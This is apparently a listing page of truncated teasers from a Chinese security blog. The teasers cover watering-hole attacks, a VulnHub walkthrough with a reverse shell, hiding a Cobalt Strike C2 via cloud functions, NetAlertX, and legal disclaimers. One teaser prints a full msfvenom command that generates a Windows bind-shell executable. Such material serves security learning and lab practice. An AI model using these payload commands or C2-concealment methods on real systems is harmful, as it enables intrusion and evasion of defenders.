免责声明本站所提供的文字和信息仅供学习和研究使用，请读者自觉遵守法律法规，不得利用本公众号所提供的信息从事任何违法活动。本公众号不对读者的任何违法行为承担任何责任。工具来自网络，安...

0x01 前言水坑攻击属于APT攻击的一种，与其他社会工程手段(例如网络钓鱼)相比，水坑攻击的危险性来源于其利用的是不会被列入黑名单的合法网站。黑客无需耗费精力制作钓鱼网站，而是利用合法网站...

视频  前言首先是我准备的镜像包是我做好的懒人包，只需要安装即可使用；这里说一下我做的镜像包的密码，root密码是1其他的软件密码统一是1 2 3 4 5 6链接：2.Termux安装kali-Linux先安装我分...

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。...

生成反弹shellmsfvenom -p windows/shell/bind_tcp lhost=1.1.1.1 lport=4444 -a x86 --platform win -f exe -o a.exe加密编码反弹shellmsfvenom -p windows/shell/bind_tcp lhost=1.1.1.1 lpor...

目录浏览漏洞属于目录遍历漏洞的一种，目录浏览漏洞是由于网站存在配置缺陷，存在目录可浏览漏洞，这会导致网站很多隐私文件与目录泄露，比如数据库备份文件、配置文件等，攻击者利用该信息可以...

说在前面首先很重要的是授权 ~ 首先很重要的是授权 ~ 首先很重要的是授权 ~之前也看过很多关于渗透测试的文章，但是因为一些现实因素等等问题，没（bu）有(gan)真正实操，最近由于一次偶然的机...

前言看上了随身WiFi的便携性以及内置有Android系统，想着能否将其改装成随身携带的mini服务器。找了一堆资料，发现只有高通骁龙410和210的芯片才可以刷机，手上现有的一个是展锐芯片的机子，没...

介绍NetAlertX是一款WiFi/LAN网络安全与入侵威胁检测工具，该工具能够扫描连接到您网络的设备，如果发现新的和未知的设备，会向您发出警报。NetAlertX 是💻🔍 WIFI/LAN 入侵检测器。能扫描连...

推荐阅读： 1、简介 在我们上线cs时，常会考虑这样一个问题。如果直接暴露cs服务端的IP地址，岂不很危险。于是我们通过云函数来上线我们的CS从而保护服务端IP。对于攻击者而言，隐藏自己的C2是...

前言：本练习的靶机是vulnhub平台下的sar，该靶机是一个类似oscp的虚拟机，目的是提高并巩固渗透测试的知识点。主要利用方式：sar2HTML命令执行反弹shell（可php文件上传反弹shell）+定时脚本提...

免责申明本教程的技术文章仅供参考，只用于教育目的，只是演示一些工具和工具的使用以及渗透思路，大佬勿喷，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进...